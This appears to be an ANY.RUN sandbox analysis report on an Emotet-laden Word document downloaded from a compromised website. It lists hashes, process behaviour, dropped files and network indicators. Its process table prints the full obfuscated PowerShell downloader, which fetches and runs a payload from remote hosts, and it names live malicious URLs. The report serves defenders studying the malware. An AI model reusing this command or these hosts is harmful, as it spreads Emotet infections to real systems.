analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://saigontiepthi.vn/wp-content/statement/u5varl/

Full analysis: https://app.any.run/tasks/ec16667b-94b9-4193-9ea9-c3973235db7a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2020, 14:51:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
Indicators:
MD5:

9FEE2C894CA8011938EE7E7066B4AD5D

SHA1:

6EA3D9B5FF8EF46064181E0C4767D4A22068D52E

SHA256:

5A8953625AF76A12F42A9901E3441376CCF6D77FA246DA70BF49E21ADCF01807

SSDEEP:

3:N1KNEMt7e+SifAQWNIuRLGtn:CWMt7fSOAJRL4n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • iexplore.exe (PID: 3276)
      • WINWORD.EXE (PID: 3688)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • iexplore.exe (PID: 2600)
      • WINWORD.EXE (PID: 3688)
    • Application launched itself

      • WINWORD.EXE (PID: 3688)
    • Creates files in the user directory

      • Powershell.exe (PID: 4044)
    • PowerShell script executed

      • Powershell.exe (PID: 4044)
    • Executed via WMI

      • Powershell.exe (PID: 4044)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3688)
      • WINWORD.EXE (PID: 2488)
    • Application launched itself

      • iexplore.exe (PID: 2600)
    • Creates files in the user directory

      • iexplore.exe (PID: 2600)
      • WINWORD.EXE (PID: 3688)
      • iexplore.exe (PID: 3276)
    • Changes internet zones settings

      • iexplore.exe (PID: 2600)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3276)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
5
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2600"C:\Program Files\Internet Explorer\iexplore.exe" "http://saigontiepthi.vn/wp-content/statement/u5varl/"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3276"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2600 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3688"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\QN529F3V\SW_PO_01172020EX[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2488"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
4044Powershell -w hidden -en JABLAHEAbABkAGYAbQBiAHYAcgA9ACcAWABpAGQAdgBvAHIAYgBrAGsAYwBnAHQAYQAnADsAJABGAHkAbQBiAGgAeQBlAHgAbQBoACAAPQAgACcANQA5ADMAJwA7ACQATgBuAHIAZwBxAGkAawBrAGYAcQB5AD0AJwBCAGoAcwBwAGMAcABzAGUAYwBxAGYAJwA7ACQATwBzAHgAagBzAHUAdgBiAGIAeAB6AGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAeQBtAGIAaAB5AGUAeABtAGgAKwAnAC4AZQB4AGUAJwA7ACQAUQBlAGUAdwBsAG8AaAB2AG4AaAB6AGoAZwA9ACcAVABxAHkAdABqAHgAaQB0AG8AZAB4AHoAZgAnADsAJABQAHYAcQBrAHIAbgBvAGEAbwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAGUAYgBjAEwASQBFAG4AdAA7ACQARgBrAG0AbgBnAGkAdABnAGEAPQAnAGgAdAB0AHAAOgAvAC8AbwBuAGkAbwBuAGcAYQBtAGUAcwAuAGoAcAAvAGMAbwBuAHQAYQBjAHQALwBpAFkALwAqAGgAdAB0AHAAOgAvAC8AcABtAHQAaABvAG0AZQAuAGMAbwBtAC8AcABvAHMAdABhAC8AZAByADMAegB4AGEALwAqAGgAdAB0AHAAOgAvAC8AdQByAGcAZQB2AGUAbgB0AGEALgBlAHMALwBpAG0AZwAvAGsAMwA1AGQAOQBxAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBvAGwAbQBlAGMALgBjAG8AbQAuAGEAcgAvAHMAaQB0AGkAbwAvAG4AVABYAFoAbwBtAEsAQwB4AC8AKgBoAHQAdABwAHMAOgAvAC8AdABpAGEAZwBvAGMAYQBtAGIAYQByAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBzADkANgAvACcALgAiAFMAcABMAGAASQBUACIAKAAnACoAJwApADsAJABYAG0AdgB0AHMAZgBmAGoAZgBqAD0AJwBOAGIAcwBmAHYAYQB2AGsAbQBzAGwAYgAnADsAZgBvAHIAZQBhAGMAaAAoACQAUQB0AHkAawBtAGcAcAB5AHkAYwB6AHkAIABpAG4AIAAkAEYAawBtAG4AZwBpAHQAZwBhACkAewB0AHIAeQB7ACQAUAB2AHEAawByAG4AbwBhAG8ALgAiAGQAYABPAFcAbgBsAG8AYQBgAEQAZgBJAGwARQAiACgAJABRAHQAeQBrAG0AZwBwAHkAeQBjAHoAeQAsACAAJABPAHMAeABqAHMAdQB2AGIAYgB4AHoAYwApADsAJABMAHEAcwBuAG8AYwBpAGMAawA9ACcATQB3AHIAbgBoAHMAawB6AGUAdQBzACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATwBzAHgAagBzAHUAdgBiAGIAeAB6AGMAKQAuACIAbABgAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADMANgA5ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAFIAdAAiACgAJABPAHMAeABqAHMAdQB2AGIAYgB4AHoAYwApADsAJABaAGoAYwB5AGUAYgB0AHUAPQAnAFAAcQByAHYAaABrAGwAcQBlAHIAaQBlACcAOwBiAHIAZQBhAGsAOwAkAEYAegBiAGIAdQBuAHQAdQB1AGwAcABzAGcAPQAnAE0AdQBzAG0AeAB4AHEAYgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAYgByAGgAdAB2AGcAZgB0AGYAegBzAD0AJwBCAHYAdgBnAGcAcABkAGkAawBzAHcAcQByACcAC:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 797
Read events
2 293
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
8
Unknown types
7

Dropped files

PID
Process
Filename
Type
2600iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
2600iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2600iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFC9A1DFE7BF20A598.TMP
MD5:
SHA256:
3688WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR5960.tmp.cvr
MD5:
SHA256:
3688WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_D72E7CFB-CA20-4E5E-808A-B55A75B6653A.0\BD1962A.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2600iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF5EC58414D032DA6E.TMP
MD5:
SHA256:
2600iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{EADF9239-3938-11EA-AB41-5254004A04AF}.dat
MD5:
SHA256:
3688WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF5154C032D85DA7FD.TMP
MD5:
SHA256:
2488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_D72E7CFB-CA20-4E5E-808A-B55A75B6653A.0\~DF6AC663D7A4A2E740.TMP
MD5:
SHA256:
3276iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:3D0671A74424760F8A1481967EB89E84
SHA256:F09D022DCB24F594E6F15E4BF390682DD88910BA23FA796540D9FFC2CCDC756E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4044
Powershell.exe
GET
210.224.185.151:80
http://oniongames.jp/contact/iY/
JP
suspicious
3276
iexplore.exe
GET
200
45.117.168.215:80
http://saigontiepthi.vn/wp-content/statement/u5varl/
VN
document
166 Kb
unknown
2600
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2600
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3276
iexplore.exe
45.117.168.215:80
saigontiepthi.vn
SUPERDATA
VN
unknown
4044
Powershell.exe
210.224.185.151:80
oniongames.jp
SAKURA Internet Inc.
JP
suspicious

DNS requests

Domain
IP
Reputation
saigontiepthi.vn
  • 45.117.168.215
unknown
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
oniongames.jp
  • 210.224.185.151
suspicious

Threats

No threats detected
No debug info